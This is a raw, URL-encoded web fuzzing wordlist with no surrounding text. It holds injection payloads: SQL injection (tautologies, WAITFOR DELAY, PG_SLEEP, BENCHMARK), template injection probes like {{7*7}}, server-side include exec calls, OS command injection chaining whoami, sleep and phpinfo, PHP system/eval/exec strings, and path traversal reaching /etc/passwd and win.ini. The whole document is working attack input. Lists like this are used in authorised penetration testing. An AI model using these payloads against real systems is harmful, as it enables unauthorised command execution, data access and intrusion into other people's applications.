%27%22%28%29%7B%7D%3B%20--%20-%23/%2A%0A
%22%27%29%7D%3B%28%7B%3B%20--%20-%23/%2A//%0A
%27%20or%20%271%27%3D%271%27--%20-%0A
%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C.%0A
%7B%7B7%2A7%7D%7D%0A
%7B7%2A7%7D%0A
%24%7B7%2A7%7D%0A
%23%7B7%2A7%7D%0A
%3C%25%3D%207%2A7%20%25%3E%0A
%24%7B%7B7%2A7%7D%7D%0A
%23%7B%7B7%2A7%7D%7D%0A
7%2A7%0A
%26lt%3B%21--%23exec%2520cmd%3D%26quot%3B/usr/bin/whoami%3B--%26gt%3B%0A
%26lt%3B%21--%23exec%2520cmd%3D%26quot%3Bwhoami%3B--%26gt%3B%0A
%7C%20whoami%0A
%26%20whoami%0A
%26%26%20whoami%0A
%7C%7C%20whoami%0A
%3B%20whoami%0A
%7Cwhoami%7C%0A
%3Bsystem%28%27whoami%27%29%0A
%5Cnwhoami%5Cn%0A
%7Cnwhoami%5Cn%0A
a%29%3B/usr/bin/whoami%0A
a%3B/usr/bin/whoami%0A
a%29%3B/usr/bin/whoami%3B%0A
a%3B/usr/bin/whoami%3B%0A
a%29%3B/usr/bin/whoami%7C%0A
a%3B/usr/bin/whoami%7C%0A
a%29%7C/usr/bin/whoami%0A
a%7C/usr/bin/whoami%0A
a%29%7C/usr/bin/whoami%3B%0A
a%7C/usr/bin/whoami%0A
%3C%3Fphp%20system%28%22whoami%22%29%3B%3F%3E%0A
%24%28%60whoami%60%29%0A
%7C%7C%20phpinfo%28%29%0A
%7C%20phpinfo%28%29%0A
%3B%20phpinfo%28%29%0A
../../../../../etc/passwd%0A
../../../../../windows/win.ini%0A
../../../../../etc/passwd%2500%0A
%2500../../../../../etc/passwd%2500%0A
....//....//....//....//etc/passwd%0A
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini%0A
....%5C%5C....%5C%5C....%5C%5C....%5C%5Cwindows%5Cwin.ini%0A
../%5C../%5C../%5C../%5Cwindows%5Cwin.ini%0A
..%5C/..%5C/..%5C/..%5C/windows%5Cwin.ini%0A
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini%2500%0A
%2500..%5C..%5C..%5C..%5Cwindows%5Cwin.ini%2500%0A
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini%0A
eval%28%27echo%20XXXXXXXXXXXXXXXXX%27%29%0A
eval%28%27sleep%205%27%29%0A
eval%28%27sleep%205%27%29%3B%0A
eval%28%27whoami%27%29%0A
eval%28%27whoami%27%29%3B%0A
exec%28%27echo%20XXXXXXXXXXXXXX%27%29%0A
exec%28%27sleep%205%27%29%0A
exec%28%27sleep%205%27%29%3B%0A
exec%28%27whoami%27%29%0A
exec%28%27whoami%27%29%3B%0A
%7C%7C%20sleep%2010%0A
%7C%20sleep%2010%0A
%3B%20sleep%2010%0A
%7B%24%7Bsleep%2810%29%7D%7D%0A
%2520%7B%24%7Bsleep%2820%29%7D%7D%0A
%26%20sleep%2010%20%0A
%26%26%20sleep%2010%0A
sleep%2010%0A
%7C%7C%20sleep%2015%0A
%7C%20sleep%2015%0A
%3B%20sleep%2015%0A
%26%20sleep%2015%0A
%26%26%20sleep%2015%0A
%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-%0A
%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-%0A
%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-%0A
%3BWAIT%20FOR%20DELAY%20%270%3A0%3A5%27--%20-%0A
%29%3BWAIT%20FOR%20DELAY%20%270%3A0%3A5%27--%20-%0A
%27%29%3BWAIT%20FOR%20DELAY%20%270%3A0%3A5%27--%20-%0A
%3BSELECT%20PG_SLEEP%285%29--%0A
%29%3BSELECT%20PG_SLEEP%285%29--%0A
%27%29%3BSELECT%20PG_SLEEP%285%29--%0A
-SLEEP%2815%29%0A
-BENCHMARK%28100000000%2C%20rand%28%29%29